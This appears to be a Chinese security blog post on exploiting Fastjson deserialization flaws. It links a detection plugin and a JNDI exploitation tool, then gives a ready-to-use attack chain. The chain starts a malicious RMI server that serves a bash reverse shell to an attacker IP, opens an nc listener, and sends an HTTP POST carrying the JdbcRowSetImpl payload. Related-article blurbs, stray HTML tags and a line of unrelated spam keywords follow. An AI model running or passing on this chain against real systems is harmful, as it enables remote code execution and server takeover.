<menu id="guoca"></menu>
<nav id="guoca"></nav><xmp id="guoca">
  • <xmp id="guoca">
  • <nav id="guoca"><code id="guoca"></code></nav>
  • <nav id="guoca"><code id="guoca"></code></nav>

    Fastjson 漏洞利用技巧

    VSole2022-05-08 15:26:11

    每次看到json數據包,都難免會想起Fastjson以及它多個版本存在的漏洞。

    如何實現自動化檢測以及簡化攻擊步驟,從而提升漏洞發現能力,讓你更有效率的Tips,在這里和大家分享下。


    01、自動化漏洞檢測

    一款基于BurpSuite的被動式FastJson檢測插件,這個插件會對BurpSuite傳進來的帶有json數據的請求包進行檢測。

    Github項目地址:

    https://github.com/pmiaowu/BurpFastJsonScan
    

    02、簡化攻擊步驟

    在這里我們可以使用一款JNDI服務利用工具,來簡化fastjson漏洞檢測的步驟,輔助漏洞利用和滲透。

    Github項目地址:


    https://github.com/wyzxxz/jndi_tool
    

    Fstjson漏洞利用:

    (1)開啟RMI服務

    java -cp jndi_tool.jar jndi.EvilRMIServer 1099 8888 "bash -i >&/dev/tcp/xxxx.xxx.xxx.xxx/12345 0>&1"
    

    (2)設置監聽服務器

    nc -lvvp 12345
    

    (3)構造請求發送payload

    POST /login HTTP/1.1Host: xxx.xxx.xxx.xxxAccept: application/json, text/plain, */*User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.54 Safari/537.36Content-Type: application/json;charset=UTF-8Accept-Encoding: gzip, deflateAccept-Language: zh-CN,zh;q=0.9,en;q=0.8Connection: closeContent-Length: 111
    {"@type":"com.sun.rowset.JdbcRowSetImpl","dataSourceName":"rmi://xxx.xxx.xxx.xxx:1099/Object","autoCommit":true}
    

    (4)目標系統收到POST請求,成功反彈shell。

    fastjsonfastjson使用
    本作品采用《CC 協議》,轉載必須注明作者和本文鏈接
    Fastjson 反序列化遠程代碼執行漏洞 Fastjson 是一款開源的高性能 JSON 解析處理庫,在國內被廣泛使用。5 月 23 日,Fastjson 官方發布安全通告,聲明修復了一處新的反序列化漏洞: https://github.com/alibaba/fastjson/wiki/security_update_20220523
    FastJson結合二次反序列化繞過黑名單
    近期,啟明星辰集團北冥數據實驗室在漏洞監控中發現fastjson官方發布公告稱,fastjson 1.2.80及以下存在新的風險,并在第一時間對fastjson官方發布的安全公告進行分析研判,結合泰合盤古平臺(THPangu-OS)的底座能力,為廣大用戶給出應急處置指引方案。
    fastjson.jar是阿里開發的一款專門用于Java開發的包,可以方便的實現json對象與JavaBean對象的轉換,實現JavaBean對象與json字符串的轉換,實現json對象與json字符串的轉換。除了這個fastjson以外,還有Google開發的Gson包,其他形式的如net.sf.json包,都可以實現json的轉換。方法名稱不同而已,最后的實現結果都是一樣的。
    Fastjson是阿里巴巴的開源JSON解析庫,它可以解析JSON格式的字符串,支持將Java Bean序列化為JSON字符串,也可以從JSON字符串反序列化到JavaBean。由于具有執行效率高的特點,應用范圍廣泛。
    本篇文章是Fastjson框架漏洞復現,記錄了近幾年來爆出的Fastjson框架漏洞,主要分為四個部分:Fastjson簡介、Fastjson環境搭建、Fastjson漏洞復現、Fastjson工具介紹。 本篇文章由淺入深地介紹了Fastjson的一系列反序列化漏洞,基于RMI或LDAP方式反序列化漏洞利用對Fastjson進行RCE。在學習Fastjson過程中閱讀了幾十篇中英文Fastjson
    鑒于該漏洞影響范圍極大,建議企業盡快做好自查及防護。
    Spring MVC是一種基于Java的實現了Web MVC設計模式的請求驅動類型的輕量級Web框架,即使用了MVC架構模式的思想,將web層進行職責解耦,基于請求驅動指的就是使用請求-響應模型,框架的目的就是幫助我們簡化開發,Spring Web MVC也是要簡化我們日常Web開發的
    Fastjson 是一個 Java 庫,可以將 Java 對象轉換為 JSON 格式,當然它也可以將 JSON 字符串轉換為 Java 對象。Fastjson 可以操作任何 Java 對象,即使是一些預先存在的沒有源碼的對象。 在進行fastjson的漏洞復現學習之前需要了解幾個概念,如下:
    VSole
    網絡安全專家
      亚洲 欧美 自拍 唯美 另类